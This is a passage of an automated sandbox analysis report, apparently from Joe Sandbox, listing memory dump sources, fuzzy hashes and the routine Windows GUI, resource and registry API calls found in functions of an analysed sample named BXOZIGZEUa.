                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Window$CopyUnion
                                                                  • String ID:
                                                                  • API String ID: 8512700-0
                                                                  • Opcode ID: d428d26ee04a6815b678eab2e967ba042210c41a000c89e1618951c0c88ad767
                                                                  • Instruction ID: d181f021ad8d4f3d9fb7100a26f278c4499062c36cab0798776b9b21f17ebb98
                                                                  • Opcode Fuzzy Hash: d428d26ee04a6815b678eab2e967ba042210c41a000c89e1618951c0c88ad767
                                                                  • Instruction Fuzzy Hash: A721E8B2D10619DFCB10DFAAD9848EEFBF8FF98710B20456BE455E6110D6709A80CFA0
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: __getptd_noexit
                                                                  • String ID:
                                                                  • API String ID: 3074181302-0
                                                                  • Opcode ID: cbfd8487cc38a244dd088d3997f9ad064ccf10cc22fdabe1faec45a366230dca
                                                                  • Instruction ID: eb9a9765785442678a1ee80ade577315313af87a587b2a885aa142fc7efc1012
                                                                  • Opcode Fuzzy Hash: cbfd8487cc38a244dd088d3997f9ad064ccf10cc22fdabe1faec45a366230dca
                                                                  • Instruction Fuzzy Hash: 3511D371520245AFDF212FA1EC4AF9E3B68EB823A4F110218F9559B191EB70CD70DB50
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 001CA504
                                                                    • Part of subcall function 001C8E6A: _malloc.LIBCMT ref: 001C8E88
                                                                  • __CxxThrowException@8.LIBCMT ref: 001CA549
                                                                  • FormatMessageW.KERNEL32(00001100,00000000,?,00000800,001CAFE2,00000000,00000000,?,001CAFE2,0031BC4C,00000004,001C8C28,001CAFE2,?,001CAFE2), ref: 001CA573
                                                                  • LocalFree.KERNEL32(001CAFE2,001C8C28,001CAFE2,?,001CAFE2), ref: 001CA5A1
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc
                                                                  • String ID:
                                                                  • API String ID: 1776251131-0
                                                                  • Opcode ID: 4599ce47bc9db097fc747358109619ebd7e0f8bb674b6cd6e4bf423850694f61
                                                                  • Instruction ID: 4aa738d8376f62de391e46bcf2c363406d561baef5b5eaeb77298f2f9a887f8b
                                                                  • Opcode Fuzzy Hash: 4599ce47bc9db097fc747358109619ebd7e0f8bb674b6cd6e4bf423850694f61
                                                                  • Instruction Fuzzy Hash: 70110D71900308EFDB069F60CC01FEA3BA8FF94B18F20C119F9298A290DB70CA508B91
                                                                  APIs
                                                                  • FindResourceW.KERNEL32(?,?,00000005,00000005,?,00000000,?,00297C5F,00000005,?), ref: 0029799C
                                                                  • LoadResource.KERNEL32(?,00000000,?,00000000,?,00297C5F,00000005,?), ref: 002979B1
                                                                  • LockResource.KERNEL32(00000000,?,00000000,?,00297C5F,00000005,?), ref: 002979C3
                                                                  • GlobalFree.KERNEL32(?), ref: 002979FD
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$FindFreeGlobalLoadLock
                                                                  • String ID:
                                                                  • API String ID: 3898064442-0
                                                                  • Opcode ID: a74b659e93d0b389713c3b5bf9efcd71b9e420dabd6787aa48c60940da0a3f7c
                                                                  • Instruction ID: 764658fb9d41e5abc86ea8eff09a5a7e03b88264849863d3d6dd1de2789e7d24
                                                                  • Opcode Fuzzy Hash: a74b659e93d0b389713c3b5bf9efcd71b9e420dabd6787aa48c60940da0a3f7c
                                                                  • Instruction Fuzzy Hash: 5A11C8352246469FDF215F25D848F2A7BE9EF90361B15842DF85987221DF30D811CF10
                                                                  APIs
                                                                  • GetParent.USER32(?), ref: 001DF761
                                                                  • SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 001DF7A4
                                                                  • RedrawWindow.USER32(?,00000000,00000000,00000185), ref: 001DF7B0
                                                                  • SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 001DF78F
                                                                    • Part of subcall function 0020BCC8: SendMessageW.USER32(?,00000234,00000000,00000000), ref: 0020BD43
                                                                    • Part of subcall function 0020BCC8: SendMessageW.USER32(?,00000229,00000000,00000000), ref: 0020BD6A
                                                                    • Part of subcall function 0020BCC8: SendMessageW.USER32(?,00000229,00000000,00000000), ref: 0020BD87
                                                                    • Part of subcall function 0020BCC8: SendMessageW.USER32(?,00000222,?,00000000), ref: 0020BD9E
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$ParentRedrawWindow
                                                                  • String ID:
                                                                  • API String ID: 2139789815-0
                                                                  • Opcode ID: 09e891e602a4e94d087089b101d3b06a27e72c834b2cd104fe3ed56179552c22
                                                                  • Instruction ID: ec5738763b870c80fa558bf164cdc9bd80151c8471f463b0d1ddea3c6b15a580
                                                                  • Opcode Fuzzy Hash: 09e891e602a4e94d087089b101d3b06a27e72c834b2cd104fe3ed56179552c22
                                                                  • Instruction Fuzzy Hash: 1011A372600209BFDB216F51DCC9EBE7AAEFB80354F14443EF6465A3A0DB719D429B50
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$CreateDestroy_memset
                                                                  • String ID:
                                                                  • API String ID: 2954890696-0
                                                                  • Opcode ID: 9615f41a094707d182a37f905c86d9678cc0f97bd3a166cdc95ff22852540533
                                                                  • Instruction ID: 4238cdd5a6af2c0926aa8bc3da84b69e60416a2f52073327d44d070cc99bf634
                                                                  • Opcode Fuzzy Hash: 9615f41a094707d182a37f905c86d9678cc0f97bd3a166cdc95ff22852540533
                                                                  • Instruction Fuzzy Hash: 68116D30A14701AFDB629F35DC49BE7BAF9EF89305F10082DB85AD6150EF71AA50DB10
                                                                  APIs
                                                                    • Part of subcall function 001DCB9E: GetDlgItem.USER32(?,?), ref: 001DCBAF
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00205614
                                                                  • GetWindowTextLengthW.USER32(?), ref: 00205641
                                                                  • GetWindowTextW.USER32(?,00000000,00000100), ref: 00205670
                                                                  • SendMessageW.USER32(?,0000014D,000000FF,?), ref: 00205691
                                                                    • Part of subcall function 001D0D9F: lstrlenW.KERNEL32(?,?,?), ref: 001D0DCB
                                                                    • Part of subcall function 001D0D9F: _memset.LIBCMT ref: 001D0DE9
                                                                    • Part of subcall function 001D0D9F: GetWindowTextW.USER32(00000000,?,00000100), ref: 001D0E03
                                                                    • Part of subcall function 001D0D9F: lstrcmpW.KERNEL32(?,?,?,?), ref: 001D0E15
                                                                    • Part of subcall function 001D0D9F: SetWindowTextW.USER32(00000000,?), ref: 001D0E21
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Text$ItemLengthLongMessageSend_memsetlstrcmplstrlen
                                                                  • String ID:
                                                                  • API String ID: 205973220-0
                                                                  • Opcode ID: cc9048d96af8bbfc8f789f45f3ff3a1c55f5042c1dfa3ef6917f36409fdf84d7
                                                                  • Instruction ID: 7f1dc8502bd26db94ac86a1ed1b8b27c566329fa564189974812dc7ee01337e5
                                                                  • Opcode Fuzzy Hash: cc9048d96af8bbfc8f789f45f3ff3a1c55f5042c1dfa3ef6917f36409fdf84d7
                                                                  • Instruction Fuzzy Hash: 6C119031010759BFCF01AFA4DC49EAA7B6AEF14320F584619F9694A1E1CB72D8A0DF44
                                                                  APIs
                                                                  • RegSetValueExW.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 001D4363
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 001D436C
                                                                  • swprintf.LIBCMT ref: 001D4389
                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 001D439A
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: ClosePrivateProfileStringValueWriteswprintf
                                                                  • String ID:
                                                                  • API String ID: 22681860-0
                                                                  • Opcode ID: 752f544a17939da77669972c4c12af4c5c51c247f2d47ad520565f1643ca73d1
                                                                  • Instruction ID: 10722b034b6330544c6dd5c13ebe091e59d470ca70e28eaa45a354e60fb370d7
                                                                  • Opcode Fuzzy Hash: 752f544a17939da77669972c4c12af4c5c51c247f2d47ad520565f1643ca73d1
                                                                  • Instruction Fuzzy Hash: 3101A172540218BBDB109F64DC86FAB73BCAB48714F110416BA01A7280DB70FD159B64
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: RectWindow$CursorFromPoint
                                                                  • String ID:
                                                                  • API String ID: 3445796726-0
                                                                  • Opcode ID: 381f8669b8f178857e2a8f3f67cc142d9d9b72b347d32fc18bb4e6b66be58daa
                                                                  • Instruction ID: bc0d46f57e055f620f01772954416b2875c55e31b3175fff42680ac256e51d17
                                                                  • Opcode Fuzzy Hash: 381f8669b8f178857e2a8f3f67cc142d9d9b72b347d32fc18bb4e6b66be58daa
                                                                  • Instruction Fuzzy Hash: A4110DB5D0020EAFCB119FA5D9848BFFBF9FF88340B60446AE64AE2110DB7499019F61
                                                                  APIs
                                                                  • GetObjectW.GDI32(?,0000000C,?), ref: 001D7CAA
                                                                  • SetBkColor.GDI32(?,?), ref: 001D7CB4
                                                                  • GetSysColor.USER32(00000008), ref: 001D7CC4
                                                                  • SetTextColor.GDI32(?,?), ref: 001D7CCC
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Color$ObjectText
                                                                  • String ID:
                                                                  • API String ID: 829078354-0
                                                                  • Opcode ID: dd8b350adfedc7fc5c9da3b3712222ff3a00598a4160a4ef712ecebaa8d6dcda
                                                                  • Instruction ID: 5ee7cc25e2fd2a4ec1f3038037497bca3c2a526a2744d83aacc6e47f438a02a3
                                                                  • Opcode Fuzzy Hash: dd8b350adfedc7fc5c9da3b3712222ff3a00598a4160a4ef712ecebaa8d6dcda
                                                                  • Instruction Fuzzy Hash: D9116D3161410AAFCB21EF689D89ABF77A8AB49311F150516FA1AD62D0EB30DD02CB60
                                                                  APIs
                                                                  • EnableMenuItem.USER32(?,00000000,?), ref: 001CC745
                                                                    • Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
                                                                    • Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22
                                                                  • GetFocus.USER32 ref: 001CC75B
                                                                  • GetParent.USER32(?), ref: 001CC769
                                                                  • SendMessageW.USER32(?,00000028,00000000,00000000), ref: 001CC77C
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: EnableException@8FocusH_prolog3ItemMenuMessageParentSendThrow
                                                                  • String ID:
                                                                  • API String ID: 3849708097-0
                                                                  • Opcode ID: f3ec5148460e8916219ef7d40ea4719f05546881b64db204ac6cf33b66fab15e
                                                                  • Instruction ID: fabcb3ff705fee6beb47a2305ec521d5f6d54d35034ee3be7fcd645de64410d7
                                                                  • Opcode Fuzzy Hash: f3ec5148460e8916219ef7d40ea4719f05546881b64db204ac6cf33b66fab15e
                                                                  • Instruction Fuzzy Hash: 75117071100704EFCB20AF65DC88D6ABBBAFBA4315710862DF14A5A960CB31EC40CED0
                                                                  APIs
                                                                  • SetActiveWindow.USER32(?), ref: 00207475
                                                                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0020748E
                                                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 002074C1
                                                                  • DragFinish.SHELL32(?), ref: 002074E9
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Drag$FileQuery$ActiveFinishWindow
                                                                  • String ID:
                                                                  • API String ID: 892977027-0
                                                                  • Opcode ID: 6160d3533e134f4aeb47554a2e0f8c591a9c3efab2b9d73ba05479388b5adf5e
                                                                  • Instruction ID: a14db8a3902ba20239997c0a0722ca7a2ee7127d30c50fc6d594923a5dad28c7
                                                                  • Opcode Fuzzy Hash: 6160d3533e134f4aeb47554a2e0f8c591a9c3efab2b9d73ba05479388b5adf5e
                                                                  • Instruction Fuzzy Hash: 661130B1A4021CABCB10EB64DD8DFEEB7B9EF54311F10059AF119A7191CB74AA80CF60
                                                                  APIs
                                                                  • GetMenuItemCount.USER32(00000000), ref: 0020B1F7
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: CountItemMenu
                                                                  • String ID:
                                                                  • API String ID: 1409047151-0
                                                                  • Opcode ID: 80a6d627f00c13b089ea750f9c34885eb6d0f6f3b0b573ac8d717d423026a0fe
                                                                  • Instruction ID: e73df6009d564dbcc476a7640d2b708a7f0327cf1f62bb28b551757f2d60503e
                                                                  • Opcode Fuzzy Hash: 80a6d627f00c13b089ea750f9c34885eb6d0f6f3b0b573ac8d717d423026a0fe
                                                                  • Instruction Fuzzy Hash: 6601D675530349BFDB224F64DCC897EBA69EB84B90F200425FC45E2191D770CDA19660
                                                                  APIs
                                                                  • GetTopWindow.USER32(?), ref: 001DA579
                                                                  • GetTopWindow.USER32(00000000), ref: 001DA5B8
                                                                  • GetWindow.USER32(00000000,00000002), ref: 001DA5D6
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Window
                                                                  • String ID:
                                                                  • API String ID: 2353593579-0
                                                                  • Opcode ID: fb058fb1d69807248f4904c606bfc173c0af35a944c564bac9da4cd783247ee8
                                                                  • Instruction ID: 622e18bf84a35475b9d885f8961ee93529d8f15e5068f02c1056339309b0490b
                                                                  • Opcode Fuzzy Hash: fb058fb1d69807248f4904c606bfc173c0af35a944c564bac9da4cd783247ee8
                                                                  • Instruction Fuzzy Hash: EB01E936001659BBCF129F95EC08EDF3A2ABF49350F954012FE1455260CB36CA61EFE2
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Destroy
                                                                  • String ID:
                                                                  • API String ID: 3707531092-0
                                                                  • Opcode ID: 01b559b8a442a8ad4614bd057918a37b7156371b5074e04754053e13c1e95b82
                                                                  • Instruction ID: 771eaea1ce759bfdb795d121da91762623c94ca466200f7f37190f0d717b620b
                                                                  • Opcode Fuzzy Hash: 01b559b8a442a8ad4614bd057918a37b7156371b5074e04754053e13c1e95b82
                                                                  • Instruction Fuzzy Hash: EE018C32205608EFEF215B64DC89FBABBA9FF50361F144629F65897150DF31AC10DA60
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,?), ref: 001D9667
                                                                  • GetTopWindow.USER32(00000000), ref: 001D967A
                                                                    • Part of subcall function 001D965A: GetWindow.USER32(00000000,00000002), ref: 001D96C1
                                                                  • GetTopWindow.USER32(?), ref: 001D96AA
                                                                  Memory Dump Source
